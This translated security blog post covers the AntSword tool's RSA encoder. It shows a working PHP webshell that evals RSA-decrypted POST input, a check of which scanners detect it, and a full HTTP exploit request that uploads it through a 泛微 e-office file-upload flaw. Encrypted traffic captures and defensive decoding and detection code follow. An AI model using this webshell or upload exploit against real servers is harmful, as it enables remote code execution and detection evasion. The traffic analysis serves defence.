This test is for learning purposes only; if it is put to illegal use, the platform and the author of this article bear no responsibility, and you are responsible for it yourself! AntSword (中國蟻劍) is an open-source, cross-platform website management tool aimed mainly at legally authorised penetration testers and at website administrators performing routine operations. Its traffic can be obfuscated with encoders and decoders to bypass detection systems such as WAFs and IDSs, and it ships with a range of practical plugins, which makes it very convenient for security testers and popular with many people.
https://github.com/AntSwordProject/antSword
Online RSA key generator site
http://web.chacuo.net/netrsakeypair
Generate the public and private key

Starting with AntSword v2.1.0, a PHP RSA encoder was added: AntSword has a built-in RSA encoder module that uses RSA asymmetric encryption for transport. New encoder -> RSA configuration -> click "Generate key pair", then configure the public key, the private key and the PHP code to generate a webshell dedicated to AntSword connections.

Encoder settings

Checking whether the generated webshell evades detection
D盾 (D-Shield): detected

冰河 webshell scanner: not detected

火絨 (Huorong): not detected

Uploading the webshell through the 泛微 (Weaver) e-office vulnerability
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 1289
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjjg16ibX4sUv4fkHmijeD5M3G
88Tp4ge9PWaYiUtXm23Tq3iEpZtpe6DkWbbLZvufHZWOQjv9sDEg5aCoeJOftRxv
JOj+nqPb3oydsxOBzuoaquE6/ZcK4ZwYF4FipaOP0uctEc49uFQnBeneJLnrKx1e
W0EArkolkjFKe8Y4DQIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
    }
}
eval($cmd);
--e64bdf16c554bbc109cecef6451c26a4--
Webshell connection address
Test method (encoder RSA + decoder default)
http://10.211.55.9:8082/images/logo/logo-eoffice.php

Test connection succeeded

Configure an HTTP proxy to capture and analyse the connection traffic
Proxy configuration (Wireshark can also be used to capture the packets)

First exchanged packet
Encoder RSA + decoder default


Encoder RSA + decoder base64


Encoder RSA + decoder rot13


URL-decoding and then base64-decoding the request data yields only unreadable bytes.

Analysis of the encoder shows that the transmitted data is RSA-encrypted (each chunk is decrypted by the webshell with the embedded public key via openssl_public_decrypt) and base64-encoded for transport, which is what lets the traffic evade detection.
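The transport format just described (payload split into chunks of key-size minus 11 bytes, each chunk processed with the private key under PKCS#1 v1.5 block type 1, base64-encoded, joined with "|" and sent as the "ant" form field) is what an incident responder has to undo once the public key has been recovered from the webshell. The following is an added example, not AntSword's code nor code from this post: it generates a constructed 1024-bit demo key pair (the post only shows the public half of its real key), builds a sample body in the same format, and then decodes it the way the webshell does, except that it counts chunks that fail instead of silently dropping them as the webshell's "if" does. Function names, the demo key and the sample payload are all assumptions made here.

```python
import base64
import random
import urllib.parse

# Deterministic RNG so the constructed demo key is reproducible between runs.
_rng = random.Random(20220412)


def _is_probable_prime(n, rounds=24):
    """Miller-Rabin test; adequate for a demo key, not for real key generation."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = _rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    while True:
        cand = _rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def make_demo_keypair(bits=1024):
    """Constructed demo RSA key (n, e, d); NOT the key from the post."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and phi % e and n.bit_length() == bits:
            return n, e, pow(e, -1, phi)


def _type1_pad(msg, k):
    # PKCS#1 v1.5 block type 1 (00 01 FF..FF 00 M): the padding RSA_private_encrypt
    # emits and the webshell's openssl_public_decrypt() expects.
    if len(msg) > k - 11:
        raise ValueError("chunk longer than k-11 bytes")
    return b"\x00\x01" + b"\xff" * (k - len(msg) - 3) + b"\x00" + msg


def _type1_unpad(em):
    if len(em) < 11 or em[0] != 0 or em[1] != 1:
        raise ValueError("bad block type")
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0:
        raise ValueError("bad padding")
    return em[i + 1:]


def client_encode(payload, n, d):
    """Mirror of the encoder's transport format, used only to build constructed sample
    traffic: private-key operation on k-11 byte chunks, base64 per chunk, '|'-joined,
    sent as the 'ant' form field."""
    k = (n.bit_length() + 7) // 8
    chunks = [payload[i:i + k - 11] for i in range(0, len(payload), k - 11)]
    enc = [base64.b64encode(
               pow(int.from_bytes(_type1_pad(c, k), "big"), d, n).to_bytes(k, "big")).decode()
           for c in chunks]
    return urllib.parse.urlencode({"ant": "|".join(enc)})


def decode_captured_body(body, n, e):
    """Defender side: recover the plaintext from a captured POST body given the public
    key (n, e) pulled from the webshell. Returns (plaintext, failed_chunk_count)."""
    k = (n.bit_length() + 7) // 8
    fields = urllib.parse.parse_qs(body)
    out, failed = b"", 0
    for part in fields.get("ant", [""])[0].split("|"):
        try:
            c = int.from_bytes(base64.b64decode(part, validate=True), "big")
            out += _type1_unpad(pow(c, e, n).to_bytes(k, "big"))
        except ValueError:  # binascii.Error is a ValueError subclass
            failed += 1
    return out, failed


if __name__ == "__main__":
    n, e, d = make_demo_keypair()
    body = client_encode(b'echo "constructed forensic sample";', n, d)  # constructed payload
    print(decode_captured_body(body, n, e))
```

In a real investigation, n and e come from the PEM block inside the recovered webshell (load it with any ASN.1/PEM parser and read the public numbers) and the body comes from the proxy or Wireshark capture; the 172-character base64 blocks seen in the captures above correspond to k = 128 bytes, i.e. a 1024-bit key.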
Connection traffic analysis
1. Base64:
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Content-Length: 2810
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YKc6gcTqiGacc%2FQ1PuCLeTUqaFsw2fOatVSzW0S1PsntU45VuBvI5msgplm%2FVJAD1o8bsswCt4UGXIw1epWyDPzFPgkAJilJr8OkwcI%2BWTV5m7n8AIhF0yOOPAocSH5iGI6m4oNt%2FQ7MBqCy1F0oT%2Fr4pBoH5OftueQi8dDLcuQ%3D%7CSupGNjon8my%2BNiArG6zK%2FcGQVH0nYrKqCyIjuWXexSpTNykDJ9kYxryrix1HOym%2FPewhjWj2LnQnwyp33mHGPRUoMb8IsXEQIgeeLOjV08LbkWb3dYzYDen3dMxLrMZz4r4rLsp4uenqc30g4X%2BQo4szxCdD1EveL%2F28FK5YJrY%3D%7CdhXaJmNV0FpVQrVFx6MsN5G%2Bxh9bdaSW5XGp%2FlP4wmB9oqAOFSbB66ONMkJjV6vBUzpLzkVxWu3CaqVwHobgHjCTpnqEtTzJ9PDLwznYDtiZeLwdeobxxJbS52L5kLFV4Q8Cs%2FGVJ3ZkmlZC0n5u0OL6Mz7oj5DpSJOxv76E3tY%3D%7CkmVlk8oig5gTjkdM0xwxLgWmICsSHgy52C4tOIHmQqW%2FJ7Th2k%2FalpjDcEXS5noQU4cGRum1zYYMyqb89feasu9FubYi872JIQWFTV1J90lwmRzesTnO1kbw%2BDDwYTZJFAqJv7oz5gzqCvtWayKwI5xC18DtJmaWGQ2pRB3h2js%3D%7CNHKMyZ5UX6GdF1aLhPgLlsx7cRILuWFgZ8LDzdFBAOjd3gsvlng0YDPYdPEgl6KEXQkOvDkRBq2vrRpDCCt2X7PjFxJxVhZQP%2FpjhEmcEp8lSJYNja6BTSSqRo3Z0TKa78rdeGwEJAAEg%2BLLKJearYOLalLqH12iaw%2BfcnY0XwI%3D%7CdAgPN66G8RP4J7KY935hmeMw12JG9QYNgLdxDwJ3JiMv4orLbq%2B5nOzH6VgXWgnUytZHtpaTf2FFr4KA3oZnSltLurBBvAXxuFiMcSr%2Bqg%2Fd1jDWI4mAsC8Z5Uz8TRBGmm1mcYNwE56u4ezW3Cjkf2nBmJmCkBUAOQQTvIW6zt0%3D%7CRbe5CDwSBZcic9Esr%2FeKg%2BJLii1A%2ByWJMGfaWrrp0%2BnXw4PYAGGT8IQHKzhdMF1GycKYPhKw4kV2szN%2FElP7rlP7gNMGxHhCGUOB%2FJlTwd4c2Z%2FHVfG4F0RLHfKqyIXii8UzRKvzicJVjk4tQV4VUuaaB%2BJqzRsfwJlh8ZxjJA0%3D%7CJ0GD%2F5W1bJCwfqWeJjRP7Crjfi5uwx%2FZh%2Bpq1pcbNtEtoqrc9J4tR27sWfVz9WY0oRVlZkajbUz9F%2B4nMe%2Fa5v%2FVEHYYjNRArOck9jrzQ9N9w%2F7qc%2FLtlR5Z%2BXgRAWw6HRI3SXQz7iI2Tr2yX%2Fc5uI7okY%2BrfwMClpXSuuHTEo8%3D%7CfohHb1C%2FzUJ77%2FIEAwmRISV%2BzsdeAygjtWPfb7XFDG3tfogdhGWxhyIm%2FgxwDbeW8%2B8qmGowryWHiGpSFc%2BdsflpoMVREYgreQAuuOKsccqVF%2B7O5hPj0wslH%2F8RXz99hu4M2RXxDGMKPi1Zjyt2xIeV0%2B0vVujqCoqj8JqaGnI%3D%7CDQBBTstRO9SvIktPWRtQPyD6qNX9Sb%2Fbyw4Err34XmvCo1pbYAqNdYzzngpKyx1ZnrH8fpHkhxEhkUiFiurfpqHiJQ6oVloYf90B%2FddykmZFkw4190%2B2rb0Hbw%2BSrduJEU7hWlKrMDqaG3Z8o8idVtbFXvihW4sM2qrKtXD5i1g%3D%7CMDHjjdGMDiHzsG94H340Z2VsjBceQ8YHaVx1SaslqoLMbTA9hov1EMTlYZm0Muy4jBin4i880UzrVBkxQBG%2F%2BeHP%2BToRLNilJZm6OJYMRdBTdSCR4qovem5W27HHaHUkZx%2BtcrvfKIA32GaFWymX3bGWHLBEe6z8xsFmqAhDjXQ%3D%7CNOGyWuBDmTeOBQmrAIdjUHR%2FfTXfW8eQSegmMwiDuOrNuETjirFOw6%2F1WwSev5CZ8jJKxMdc90o8rCXsqKl65wXzLyZuEcLWDVFb0Sdd06yr9W5D0Cec%2FyuYlxksHE9mzL%2F99uZsaCV4ETMIAHUl1IzoCwDKbNMWS6%2BuG0COlfs%3D%7CMgpQIzjmORFWFlnySqPz9TVXlg6LrZdZbWkdPDVx%2BU7zUzfcx3sAfPc7go90ketoIlFwqCa8xHf34Z7D0nPYV5n3c3GGO5IA0ASa%2Fark%2B9fPNYHQtx1H%2FjHmfrzJxnJY47BYXjkxlxx6qnszI%2FyVVDLgycd8VymeNZCRbsSF7ds%3D%7Cm7u0n8JL6%2BVeztHHYUwBwWCVuCb7V3xumKaLxKZpKqz7udyJxg36ZzCjnGu7hGmFbB2CFhl7LCk%2BCNRTniQM6AP0fXsYOYdQVLivY%2FeLSFN15dfUcjkgZGjMqejtIXdB2ovYqBIH%2FCsl1gjgwWLPX1jgLHwt23XvdZFhCEdqBik%3D%7CZS4P86VmcXviTY5mBBYs4HfEhMLBypZQ%2Fnh9aPkgiDonbEMAshMh%2BhHLVxPQhKvBoodun9SkOSnVKLKdcbR%2BEFdlRkEpEC42SVxQqFKV2fPaRlYDA8%2BeXsH07WE9MLg3laVgHFLI2BUs9r1yLMH6Cqsy79FJvacW%2FBDKX9Ql1uM%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:37 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 118
Connection: close
Content-Type: text/html; charset=utf-8

721d11efQzovZW9mZmljZS93ZWJyb290L2ltYWdlcy9sb2dvCUM6RDoJV2luZG93cyBOVCBZVU5aVUktUEMgNi4xIGJ1aWxkIDc2MDEJU1lTVEVNffc472

2. chr:
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Content-Length: 2840
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cnmv4HxDpKTfWcvCqOORZ0ccm%2FhpNNQ7XJGJPMdKx3G2xojU7C%2BKaOEBqVPPMrYJRRdVPWApUj2fSAPEeCQi87TeFm78adpzbtZmrYta7TQYFROF3UFv0hMgBvQw6ONutQntgE0GaCFRVqVC6b6ZqkUJUvHM8B8Zu9FKPzngUwlU%3D%7ChrQwyxH9%2FJx6LFT0VNv0cSd%2Ff2yzVw%2BOJiclxUKcEhV8q%2FM1Tx0Zx%2FNizuGpB%2FmmNBfzeMffSZkMxeWEtEYQK%2F4in1rK4T3RF1nZ06cneuI45rD1959C2mLSjVul0AKaFvZSTW0vL5laM4rYl1BHBhWblgVcbUWi5B6dRnk%2BjCE%3D%7CnevocVhkYRoAcVraHcND49w%2FGgpYxQM4jc1n8J%2FHrEfjNnbJmCKabgsFUb2TGmv5i0n%2FfLzTSQ%2FBo1kBztiWU4pTSBJ3iv2UBhPMG9LEB9xH%2FbkQWIa2ePIr56YWmvfN6fXy1F6lW7T7%2F4FIE%2F4DDb4jgwUncWFA504ogCNLW7E%3D%7Cdl1Wo3bpS5Elt0Q2bonJZmPJAioe3g3s%2Fx%2FfK%2F8UtCXzUhhY3kxKJb9itP%2BbPbrrbUY6lAdl13G0BE%2F2SdtFiD0Kx9b4RN30r6l8jsuJla7uc01LX%2BHjBcojGdIYr23P%2FSzZBHVffNCSljfTJbYlDO5sPJ%2FgmoBtJOLEoP0Hi70%3D%7CBTj0kRvK6GPmDn0uEm%2Fm8F3%2BsxItr1h4hR3zdVa1VF%2B%2FNXUqS3uBETvN9qPLWhGUBZfMdL1j3Vjv7vMqNQBZuxqZ2Z0irD1AWzjQrI5gaZOi0mICY67eJKWeY95udeharJ5tPVaQv9Id1jeLEKk1H2r0acEpUGpCJWtCPX%2BIWBI%3D%7CiwHLtTeNpssZ%2BLjVBEBZuNzpFkPFSRlhhzLu29D7aT%2FHRz%2BBtgT8sZuPTGJnEC6QXo0hhEzHLtZ%2BVnvGqGPGt0pNi3eGBy%2FLdAdXtigPepjtLv0EAETm%2FmJvGfgrPhM0yRAQz9AGky%2BltYhoU4uVPsWBUDR7owEZKotewpiym7k%3D%7CVLoJK05GULezBTpPlin%2FUuWZnZXg%2BFkzCUqB5eAvjiUYb6SMZPUvnI9L1KBQcJnpaT81t5O3GRufjybWYv8Y359IgxluNh6WajnkcFWXZnTAowH%2FOH8Was%2BQ9C3XCOX7kkJQEbWS7ifS%2BZJ76sfnDScEblc5iaD4jLn43isa9vE%3D%7CbPwMmWNCNQbhqma%2FLEtS18P9eLlPU4tOt3BBQb%2FwGriS9Qo%2FvDCgsb6FDkVpr27U807dvKa7ybpReM1%2FWuXVpTIFs6UeV9Tt0U6o8Edr5c5cOyYHY%2BHk0Q6%2FY8hxaWxi8GSXqlLBU3tXk817APkZq55Gdgzvha%2F6xR24K5LUW68%3D%7CTa8OgzCIJ8M39TVsfYIjfCqfgnbJU2eEFCHE1QcxeCCj78khr2hl3971WnDpiFRcvqGrHJJg2nb%2FfWf%2BhGVRuixitEktqdDf612Jg%2BZyYe40TZI%2F4AUpGjX17TNdVAjNRW4U8vL89p3%2BYwcLQyjCUgSsEsiSfOoqJOQOZcRpv4I%3D%7CA8vIoVGO2xL1mrc9GyqXBfrflBO6fsYMoZuyqYQLtdOaLxPbQlcXAPThxjizMdKeKTV0Vz8Ia9x7a6Kdz%2F928YeE6OqyNlord1aCy%2BHKRYlPnn7waenQnhkNke283xdnK5rcH7u5YmAgbcAqttNmI13jNMeTcgDIIvF7hBXsz14%3D%7CHmDv190rZS9yiVLSTLvquni0hNxuGPM%2BjUgko3n4yy2NyrYd38qmD6fXdMwE%2B2sqx9ihwnLSVRF%2FjJ8y%2B2w0JjHpzHwqtNXgAXEppAAKHrFLPvFIU%2BJ8LaqnZu%2FAZKp%2Bucb2KbpNkeOx8bjH5yk0v7qc%2BsKvvvjifHtNaIOd0us%3D%7CMnW67HYNEpuFHTxLbP3pR4AsckEbsGB03bS2fYGndibUuILPvqdsdbuU6rdrKTAZluKY%2BeFstXEgLKPK%2F4rWhPou%2FsyO%2ForB%2BnwbaKRmsSHaIdb6rH6GrmWg5wUzoliKi5iiUb4tk5wyE46MsRGmaAweg1bpCvUWlCF6GKc8ekA%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:40 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 91
Connection: close
Content-Type: text/html; charset=utf-8

4629930P:/rbssvpr/jroebbg/vzntrf/ybtb P:Q: Jvaqbjf AG LHAMHV-CP 6.1 ohvyq 7601 FLFGRZa9b886

3. default:
POST /images/logo/logo-eoffice.php HTTP/1.1
Host: 10.211.55.9:8082
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Content-Length: 2828
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

ant=YiXyFq%2Fprrg4evrbbiKnLPUMXcUjdDNePMJiFvnkuQsNf%2F2bDDbV%2BglxW6TWK%2F%2F%2F45rsR%2BY%2Fm8iLhcUt0IshzxbHC7bOLa7eKLCcuSOVLtJnAbQhG7oVEc76uBlsdCU5Wu7mPLWBYTHhhRNPwtvdlOIQbdFaxto3o17MWy9L3yw%3D%7Cc4NlNm5agVTJHbfPp%2FW2a3I1hd%2BBudSZyVUQcZAqNHsCIoPUqoxXX5p5AA1doeA2zCtn%2Feg8p3TB4UAPJbzSW%2B7Te2x62oNkRdDh%2FVr6ZlEbAG5pZC%2B0cI8GL48drvdjVECuDj74gEll9BCRW6GFpxnZXFfpMECOO3r6ZllbEnk%3D%7CLW5%2FbREDZoax%2FDbAk7ZJr%2FTPM9kfxuTZI%2F0amfCcwRAsUnuYCZ77xYtZHQTSIfXn3zw85Cr5slp5SQkReurmsAE4pIpc4IaJDQstl3zuT%2B6bH9FJa%2FSaSxMTmrUAg7k59J3z%2BkGzYwcOlp1%2BObtBHkQVZQ9xEuW2yr1QTHD%2FfJ0%3D%7Cbrg6%2BKZM7B3qYLLGppGHJ1q7yCTBr3Z6pGLX0LL87I2pQD%2BzHLt1amHKmgeQ0cEA2Y9Wp3ae11u9%2FFGcxL3YScRGu8r043fdD%2BqbSOivWbbVPbUfVv1rLCtNXyqXudWxlGJ9ACID%2Fa0ibhzyaMv9v11IupPPHXiMlPL6rw7P05k%3D%7CTyo5lbtjtq5GT3KcoNqbuL4b%2Fm4paol7bahEj%2Bas5GzKu%2BQu3M1Vm3TpSnPiTfE9xRtlvPFj8nnNnPJ%2FW1HFuDMxYw4hpcSWSQq%2FyrSEfAG1oMHDHsOj5VZE6OkHnkR%2BJv9MBDHBCrPPfLkMODATBPT2gN%2BMVNgiyIkQWmHeaSI%3D%7CekPxfn%2FJQweaqz9RdL2Xx7AyBznz3eNqY2KWCnFX3fuR2McHrvrtl2MVXgKogqQrhfFa96Ee%2B1EaJYwzk%2FcxUV0%2FzUE5YWbQFZQuH3znmR0Jd33aVZrvhDMtD23xsLw6BhaMOtQ8k8Ieoi5lt7GjDIiAAThFsSXnSXL%2Fydy15YI%3D%7Ci6C2yHJJ%2BENE%2BYAb%2F1DarE4I3Vvnz2MvVeI%2B4PH6xNKEkGNWL1dxuit7OBprlU4zF7H4r4TMTGP9dsl6eSEOL14W%2Fh888UKTVQb6h5wafxkekR6SNqMvWGdQ010UNgqZ%2BD4h5zJgFEsJc293y8ORS%2FNUpcOzqWuL2DE91SbvhPI%3D%7CAJNFE62mMKRdrNqeZQwIzsrKmnZir%2FC3nh2LF4zHhpLml%2BrEROR6pxq8VoxEyOJ4HqBokufQaXcTbliLpqdKBLXawRMoFLxB%2FcUEgnPH6QnTcGp2o4dIQyNzkC6imdYaKsTGHMMMzpcbnk1Mm2bmJu%2FH9KdAJ2RFHoWqwQm1Ox8%3D%7CRWtP1JCbFMwbB7AJkUoSoostVOcASOo65xFis3HlwhJEWPgeRFMZ7J%2Fxlalobf26%2BGn3KqG69Wou%2BkMEyULuE6UqWzVBCTvU7ZNxybEApDKkD4AJRukbdhm47MpdiGblkHrqZUvMP4Q6XrJ78a93F1qZpzulGbEBKEC2dvaudEs%3D%7Cj%2FOjvw1xVxaA4jBBbpKI%2FW1TqccJnkSa3KunBHn3Kr8lYMGS8bUSlN1HryluZQcdjn6%2B44JKhYmTqXsgmyxGCjAehNgZ1RhPDJSAx9%2FJrMbxTmXWNQjMiYIgISIHIMmwrgc4HflRmzx3XG3ArVCJbKPb1EbgJ6kFVRJKSrmvYuw%3D%7CUV%2BfJc43%2FEH02EQDYkQ%2BU8rx6CKtkkQcKLJufm%2B7zKxUjuwEeYI9pKCDXfxQCw3pgakeH3qxBMLA5iJBtp1kQgMXwqrjRxOmq37vqdEXE7NRbDXzSReD4I9Rn860ACvhqEuIHmxSuTR7QlDcmd%2Bhu2Q5jR0yMIlwEEkyIkAIef0%3D%7CeDVGOZ%2FbXT7Yt0bddjGpbAW6WCwd3f0szgeT0zLQH%2BGaRpTaHR1qzgKlJ1HdQAWLZKlTkeghqtgvTSWJdmPZXkCLVnuf3pDcWlkNWLAiIAWJGcjRu5WyZyyDQBUQuI%2FHinSIs01P2RygKyGxMdG6QfKCgEZzjw7e3f%2FkMR%2Bu4YQ%3D%7CZDF%2FGyXt35XIuWB9U9U6aIzYU3g2yIsmmAlHeWF8E5yjwKCE5Zt7fpzoh1ouDK%2B21lRIVz9QFjQHTq8EZw%2FVfLiONMC9Jq1Ju%2FTH%2F1Suwlyf%2Bwa914vs1Z0r%2Bh8udvkU%2FkweuaVoNGmp30VlU%2FW9XC%2B93DN%2F67FE%2BidxUXA5O%2B4%3D%7Cg4f7XkR0Mf8PqCpKoVekbCAKw582AiYfHhpLGo3XASJ9SEMzub5FuOrw7cd7UVUXXQHqkayiHyUh2kq%2BV7WiLtei9Sq92fp9xVWN32J8voiGsfEnBm1lPcwZbmFSa0vhzdrVmxphOarJg2wFrpYlcpY58GmlFNCwCnam52J1q9Q%3D%7CH8oR66x2cJmVBtkyuAYeFyrsqPcSSRSXCymHKK2Tbt%2FquUXV1uFmewppEt%2Fw2UDb7ARQNXXOEhCAYAyzlZaYSvWBUwejUoLIR5wzwjAzVZpIxe8xZQSfnrEjNd7aM6Fp%2FYJgwa7wSpcKeIQ%2BkUslFpEv53StQycn6hV9pJl4WXc%3D

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2022 08:41:34 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 92
Connection: close
Content-Type: text/html; charset=utf-8

a96ed3a93C:/eoffice/webroot/images/logoC:D:WindowsNTYUNZUI-PC6.1build7601SYSTEM690a7

AntSword's design and usage incorporate a lot of thinking about attack-defence confrontation. Three detection recommendations follow:
First, detect the upload of the RSA webshell at the attack entry point, using static detection rules, a sandbox, or a webshell scanning engine (on traffic, behaviour, and so on).
Second, detect AntSword's strong traffic-side characteristics; these can be extracted by studying the analysis above.
Third, use threat hunting for all-round monitoring, and when an anomaly is found, trace it back through the full traffic to locate the attack.
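The second recommendation asks for traffic-side characteristics to be extracted from the captures above. The ones visible there are: a POST with a single form field whose value is a "|"-separated list of base64 blocks, every block the same length and that length a whole RSA modulus (128 bytes for the 1024-bit key in the webshell), and a User-Agent that changes from request to request for the same source and path. The following is an added example, not code from this post or from any detection product: it applies those two checks to constructed sample request records (field names, the record layout and the sample values are assumptions made here; the path and two User-Agent strings are copied from the captures).

```python
import base64
import urllib.parse
from collections import defaultdict


def rsa_chunk_profile(body, plausible_sizes=(128, 256, 512)):
    """Return a feature dict if the form body has exactly one field whose value is a
    '|'-separated list of base64 blocks that all decode to one plausible RSA modulus
    size; otherwise None. Anything that fails strict base64 decoding is not a hit."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    if len(fields) != 1:
        return None
    (name, values), = fields.items()
    blocks = values[0].split("|")
    sizes = set()
    for block in blocks:
        try:
            sizes.add(len(base64.b64decode(block, validate=True)))
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
    if len(sizes) != 1:
        return None
    size = sizes.pop()
    if size not in plausible_sizes:
        return None
    return {"field": name, "chunks": len(blocks), "block_bytes": size, "key_bits": size * 8}


def rotating_user_agents(records):
    """Group requests by (src, path) and report groups whose User-Agent changes between
    requests, as it does across the three captures above."""
    seen = defaultdict(set)
    for r in records:
        seen[(r["src"], r["path"])].add(r["ua"])
    return {key: sorted(uas) for key, uas in seen.items() if len(uas) > 1}


def triage(records):
    """Return (path, profile) for every POST whose body matches the RSA-chunk shape."""
    hits = []
    for r in records:
        if r["method"] != "POST":
            continue
        prof = rsa_chunk_profile(r["body"])
        if prof:
            hits.append((r["path"], prof))
    return hits


def _fake_block(seed, size=128):
    # Constructed stand-in for one 128-byte RSA output; real blocks are indistinguishable
    # from random bytes, the detector only looks at their length.
    return base64.b64encode(bytes([seed]) * size).decode()


UA_A = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
UA_B = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"

# Constructed sample records (not taken from a real log).
SAMPLE = [
    {"src": "10.211.55.2", "method": "POST", "path": "/images/logo/logo-eoffice.php", "ua": UA_A,
     "body": urllib.parse.urlencode({"ant": "|".join(_fake_block(i) for i in range(1, 16))})},
    {"src": "10.211.55.2", "method": "POST", "path": "/images/logo/logo-eoffice.php", "ua": UA_B,
     "body": urllib.parse.urlencode({"ant": "|".join(_fake_block(i) for i in range(20, 23))})},
    {"src": "10.211.55.3", "method": "POST", "path": "/login.php", "ua": UA_A,
     "body": "username=alice&password=hunter2"},
    {"src": "10.211.55.3", "method": "POST", "path": "/api/upload", "ua": UA_A,
     "body": urllib.parse.urlencode({"data": base64.b64encode(b"Z" * 100).decode()})},
]


if __name__ == "__main__":
    for path, prof in triage(SAMPLE):
        print(path, prof)
    print(rotating_user_agents(SAMPLE))
```

Neither check is a signature on its own: a legitimate application could post equally sized base64 blocks, and a proxy pool can also vary User-Agents. Together with the first recommendation (the upload of a PHP file whose body calls openssl_public_decrypt and eval) they give a hunt query with a low false-positive rate, and the decoded chunks can then be recovered with the public key as described earlier in this post.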